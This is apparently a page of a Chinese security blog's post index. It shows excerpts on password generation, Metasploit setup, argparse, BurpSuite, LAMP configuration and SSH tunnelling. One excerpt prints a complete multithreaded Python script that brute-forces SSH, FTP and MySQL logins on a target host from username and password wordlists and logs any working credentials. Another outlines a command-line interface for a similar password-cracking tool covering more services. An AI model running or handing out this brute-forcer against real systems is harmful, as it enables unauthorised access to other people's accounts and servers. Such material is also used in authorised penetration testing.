Python 实现密码生成器
0x00 简介
有时候需要在网上注册许多账号,如果每个账户密码都一样的话,若被别人得知一个密码则所有账户就都沦陷了,若密码不一样则可能会忘记,在这里就用脚本写一个生成密码的工具,只需输入域名和账户名就可以根据key生成不一样的密码,也可以把域名和账户名写入文件,这样你用户名也可以不用记了。。。
more...Python 实现多线程弱口令爆破
0x00 脚本
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'this script can bruter ftp/ssh/mysql'
__author__ = 'reber'
import Queue
import threading
import time
import logging
import socket
from optparse import OptionParser
import paramiko
from ftplib import FTP
import MySQLdb
#################公有类#################
class CommonFun(object):
"""docstring for CommonFun"""
def __init__(self):
super(CommonFun, self).__init__()
def set_log(self,lname):
logger = logging.getLogger(lname)
logger.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
ch.setFormatter(formatter)
logger.addHandler(ch)
def show_log(self, lname, msg):
a = logging.getLogger(lname)
a.debug(msg)
def show_result(self, lname, rlist):
if rlist:
print "###################################################################"
for x in rlist:
self.show_log(lname,x)
else:
print "not found..."
#################SSH爆破模块#################
class SshBruter(CommonFun):
"""docstring for SshBruter"""
def __init__(self, *args):
super(SshBruter, self).__init__()
(options,arg) = args
self.host = options.host
self.userfile = options.userfile
self.passfile = options.passfile
self.threadnum = options.threadnum
self.timeout = options.timeout
self.result = []
self.set_log(self.host)
self.qlist = Queue.Queue()
self.is_exit = False
print self.host,self.userfile,self.passfile,self.threadnum
def get_queue(self):
with open(self.userfile, 'r') as f:
ulines = f.readlines()
with open(self.passfile, 'r') as f:
plines = f.readlines()
for name in ulines:
for pwd in plines:
name = name.strip()
pwd = pwd.strip()
self.qlist.put(name + ':' + pwd)
def thread(self):
while not self.qlist.empty():
if not self.is_exit:
name,pwd = self.qlist.get().split(':')
try:
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(hostname=self.host,port=22,username=name,password=pwd,timeout=self.timeout)
time.sleep(0.05)
ssh.close()
s = "[OK] %s:%s" % (name,pwd)
self.show_log(self.host,s)
self.result.append(s)
except socket.timeout:
self.show_log(self.host,"Timeout...")
self.qlist.put(name + ':' + pwd)
time.sleep(3)
except Exception, e:
error = "[Error] %s:%s" % (name,pwd)
self.show_log(self.host,error)
pass
else:
break
def run(self):
self.get_queue()
starttime = time.time()
threads = []
for x in xrange(1,self.threadnum+1):
t = threading.Thread(target=self.thread)
threads.append(t)
t.setDaemon(True) #主线程完成后不管子线程有没有结束,直接退出
t.start()
try:
while True:
if self.qlist.empty():
break
else:
time.sleep(1)
except KeyboardInterrupt:
self.is_exit = True
print "Exit the program..."
print "Waiting..."
time.sleep(5)
self.show_result(self.host,self.result)
finishetime = time.time()
print "Used time: %f" % (finishetime-starttime)
#################FTP爆破模块#################
class FtpBruter(CommonFun):
"""docstring for FtpBruter"""
def __init__(self, *args):
super(FtpBruter, self).__init__()
(options,arg) = args
self.host = options.host
self.userfile = options.userfile
self.passfile = options.passfile
self.threadnum = options.threadnum
self.timeout = options.timeout
self.result = []
self.set_log(self.host)
self.qlist = Queue.Queue()
print self.host,self.userfile,self.passfile,self.threadnum
def get_queue(self):
with open(self.userfile, 'r') as f:
ulines = f.readlines()
with open(self.passfile, 'r') as f:
plines = f.readlines()
for name in ulines:
for pwd in plines:
name = name.strip()
pwd = pwd.strip()
self.qlist.put(name + ':' + pwd)
def thread(self):
while not self.qlist.empty():
name,pwd = self.qlist.get().split(':')
try:
ftp = FTP()
ftp.connect(self.host, 21, self.timeout)
ftp.login(name, pwd)
time.sleep(0.05)
ftp.quit()
s = "[OK] %s:%s" % (name,pwd)
self.show_log(self.host,s)
self.result.append(s)
except socket.timeout:
self.show_log(self.host,"Timeout...")
self.qlist.put(name + ':' + pwd)
time.sleep(1)
except Exception, e:
error = "[Error] %s:%s" % (name,pwd)
self.show_log(self.host,error)
pass
def run(self):
self.get_queue()
starttime = time.time()
threads = []
for x in xrange(1,self.threadnum+1):
t = threading.Thread(target=self.thread)
threads.append(t)
t.setDaemon(True) #主线程完成后不管子线程有没有结束,直接退出
t.start()
try:
while True:
if self.qlist.empty():
break
else:
time.sleep(1)
except KeyboardInterrupt:
self.is_exit = True
print "Exit the program..."
print "Waiting..."
time.sleep(5)
self.show_result(self.host,self.result)
finishetime = time.time()
print "Used time: %f" % (finishetime-starttime)
#################MySQL爆破模块#################
class MysqlBruter(CommonFun):
"""docstring for MysqlBruter"""
def __init__(self, *args):
super(MysqlBruter, self).__init__()
(options,arg) = args
self.host = options.host
self.userfile = options.userfile
self.passfile = options.passfile
self.threadnum = options.threadnum
self.timeout = options.timeout
self.result = []
self.set_log(self.host)
self.qlist = Queue.Queue()
print self.host,self.userfile,self.passfile,self.threadnum
def get_queue(self):
with open(self.userfile, 'r') as f:
ulines = f.readlines()
with open(self.passfile, 'r') as f:
plines = f.readlines()
for name in ulines:
for pwd in plines:
name = name.strip()
pwd = pwd.strip()
self.qlist.put(name + ':' + pwd)
def thread(self):
while not self.qlist.empty():
name,pwd = self.qlist.get().split(':')
try:
conn = MySQLdb.connect(host=self.host, user=name, passwd=pwd, db='mysql', port=3306)
if conn:
# time.sleep(0.05)
conn.close()
s = "[OK] %s:%s" % (name,pwd)
self.show_log(self.host,s)
self.result.append(s)
except socket.timeout:
self.show_log(self.host,"Timeout")
self.qlist.put(name + ':' + pwd)
time.sleep(3)
except Exception, e:
error = "[Error] %s:%s" % (name,pwd)
self.show_log(self.host,error)
pass
def run(self):
self.get_queue()
starttime = time.time()
threads = []
for x in xrange(1,self.threadnum+1):
t = threading.Thread(target=self.thread)
threads.append(t)
t.setDaemon(True) #主线程完成后不管子线程有没有结束,直接退出
t.start()
try:
while True:
if self.qlist.empty():
break
else:
time.sleep(1)
except KeyboardInterrupt:
self.is_exit = True
print "Exit the program..."
print "Waiting..."
time.sleep(5)
self.show_result(self.host,self.result)
finishetime = time.time()
print "Used time: %f" % (finishetime-starttime)
def main():
parser = OptionParser(usage='Usage: python %prog [options] type')
parser.add_option('-i','--host',dest='host',help='target ip')
parser.add_option('-o','--timeout',type=int,dest='timeout',default=5,help='timeout')
parser.add_option('-t','--thread',type=int,dest='threadnum',default=10,help='threadnum')
parser.add_option('-L','--userfile',dest='userfile',default='username.txt',help='userfile')
parser.add_option('-P','--passfile',dest='passfile',default='password.txt',help='passfile')
(options, args) = parser.parse_args()
if not args:
parser.print_help()
exit()
if args[0]=='ssh':
if options.host:
ssh = SshBruter(options, args)
ssh.run()
else:
parser.print_help()
elif args[0]=='ftp':
if options.host:
ftp = FtpBruter(options, args)
ftp.run()
else:
parser.print_help()
elif args[0]=='mysql':
if options.host:
mysql = MysqlBruter(options, args)
mysql.run()
else:
parser.print_help()
else:
print "type must be ssh or ftp or mysql"
if __name__ == '__main__':
main()
0x01 尝试爆破
Metasploit 利用 workspace 进行批量扫描爆破
0x00 启动
0x01 Metasploit的工作平台
在msf里的工作平台可以保存历史的一些操作信息
0x02 使用db_nmap扫描主机
扫描后的结果会保留在工作平台中,可以用hosts和services进行查看:
Ubuntu 下安装 Metasploit
0x00 安装Metasploit
- 下载msfinstall脚本
$ curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
- 修改文件权限
$ chmod 755 msfinstall
- 安装(可能时间较久)
$ ./msfinstall
- 更新exp
$ msfupdate
0x01 连接数据库
- 首先启动postgresql数据库
$ /etc/init.d/postgresql start #service postgresql start也可以
- 初始化MSF数据库(关键步骤)
$ msfdb init
- 运行msfconsole
$ msfconsole
- 在msf中查看数据库连接状态
msf > db_status
#若出现错误:Module database cache not built yet, using slow search
#则重新构建缓存,缓存构建通常需要5-10分钟左右。
#构建完成后,退出Metasploit控制台,然后重新进入即可使用数据库缓存进行搜索模块
msf > db_rebuild_cache
0x02 Metasploit Cheat Sheet
常见命令可以看下 https://www.comparitech.com/net-admin/metasploit-cheat-sheet/
more...Python 命令行参数解析
0x00 argparse 模块
参考 https://docs.python.org/zh-cn/3.7/library/argparse.html
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import argparse
class Parser(object):
"""Parser"""
def __init__(self):
super(Parser, self).__init__()
self.service_type_list = [
"ssh","telnet","ftp",
"mysql","mssql","oracle","pgsql","redis"
]
self.log_level = ["debug", "info", "warning", "error", "critical"]
self.example = """Example:
\r python3 {} -s ssh -i 123.123.123.123
\r python3 {} -s ssh -i 123.123.123.123/24 -l root -p 123456"""
def parser(self):
parser = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,#使 example 可以换行
add_help=True,
# description = "常见服务口令爆破",
)
parser.epilog = self.example.format(parser.prog,parser.prog)
parser.add_argument("-i", dest="host", type=str,
help="Target ip")
parser.add_argument("-iL", dest="host_file", type=str,
help="Target file name, one ip per line")
parser.add_argument("-l", dest="user", type=str,
help="username")
parser.add_argument("-p", dest="pwd", type=str,
help="password")
parser.add_argument("-lp", dest="user_pwd_file", type=str,
help="user_pwd file, example: username:password")
parser.add_argument("-L", dest="user_file", type=str,
help="username file")
parser.add_argument("-P", dest="pwd_file", type=str,
help="password file")
parser.add_argument("--port", dest="port", type=int,
help="Target port")
parser.add_argument("-s", dest="service_type", type=str, required=True,
choices=self.service_type_list, help="Service type")
parser.add_argument("-t", dest="thread_num", type=int, default=10,
help="The number of threads, default is 10 threads")
parser.add_argument("-T", dest="timeout", type=int, default=10,
help="Timeout, default is 10s")
parser.add_argument("-v", dest="log_level", type=str, default="info",
choices=self.log_level, help="Log Level, default is 'info'")
# args = parser.parse_args()
# parser.print_help()
return parser
@staticmethod
def init():
parser = Parser().parser()
return parser
if __name__ == "__main__":
parser = Parser().init()
args = parser.parse_args()
parser.print_help()
0x02 运行
➜ python3 tmp.py
usage: tmp.py [-h] [-i HOST] [-iL HOST_FILE] [-l USER] [-p PWD]
[-lp USER_PWD_FILE] [-L USER_FILE] [-P PWD_FILE] [--port PORT]
-s {ssh,telnet,ftp,mysql,mssql,oracle,pgsql,redis}
[-t THREAD_NUM] [-T TIMEOUT]
[-v {debug,info,warning,error,critical}]
tmp.py: error: the following arguments are required: -s
➜ python3 tmp.py -s ssh
usage: tmp.py [-h] [-i HOST] [-iL HOST_FILE] [-l USER] [-p PWD]
[-lp USER_PWD_FILE] [-L USER_FILE] [-P PWD_FILE] [--port PORT]
-s {ssh,telnet,ftp,mysql,mssql,oracle,pgsql,redis}
[-t THREAD_NUM] [-T TIMEOUT]
[-v {debug,info,warning,error,critical}]
optional arguments:
-h, --help show this help message and exit
-i HOST Target ip
-iL HOST_FILE Target file name, one ip per line
-l USER username
-p PWD password
-lp USER_PWD_FILE user_pwd file, example: username:password
-L USER_FILE username file
-P PWD_FILE password file
--port PORT Target port
-s {ssh,telnet,ftp,mysql,mssql,oracle,pgsql,redis}
Service type
-t THREAD_NUM The number of threads, default is 10 threads
-T TIMEOUT Timeout, default is 10s
-v {debug,info,warning,error,critical}
Log Level, default is 'info'
Example:
python3 tmp.py -s ssh -i 123.123.123.123
python3 tmp.py -s ssh -i 123.123.123.123/24 -l root -p 123456
BurpSuite 抓手机包
0x00 环境设置
Windows Phone手机和电脑处于同一无线环境下:
0x01 BurpSuite设置
0x02 抓HTTP包
0x03 抓HTTPS包
挂burpsuite的代理下载证书
more...
Linux 下虚拟主机搭建多站点
环境:CentOS-6.5-x86_64-minimal
0x00 搭建LAMP
安装Apache
yum install httpd安装MySQL
- yum install mysql mysql-server
- 设置数据库
[reber@localhost conf]$ sudo mysql_secure_installation # 更新root密码: [reber@localhost conf]$ mysql -uroot –p mysql> use mysql; mysql> update user set password=password('123456') where user='root'; mysql> flush privileges; //不想重启mysql就使新密码生效就需要运行此命令刷新 mysql> insert into mysql.user(Host,User,Password) values("localhost","blog",password("123456")); # mysql> detele form mysql.user where User='blog' and Host='localhost'; //这步可以删除用户 mysql> flush privileges; //刷新 mysql> create database db_blog; Query OK, 1 row affected (0.00 sec) # 授权用户"blog"拥有db_blog数据库的所有权限 mysql> grant all privileges on db_blog.* to blog@localhost identified by '666666'; mysql> flush privileges; //刷新 [reber@localhost conf]$ mysql –ublog –p //此时就需要用666666登陆数据库db_blog安装PHP
more...
Python 的 scapy 模块简单使用
Web常见漏洞脑图
Web常见漏洞
SSH 免密登录及 SSH 隧道
0x00 SSH相关选项
-V 显示版本
-f 输入密码后进入后台模式
-N 不执行远程命令,一般与-f连用,用于端口转发
-C 压缩传输的数据,网速快时会影响速度
more...
Previous Page
9 of 18
Next Page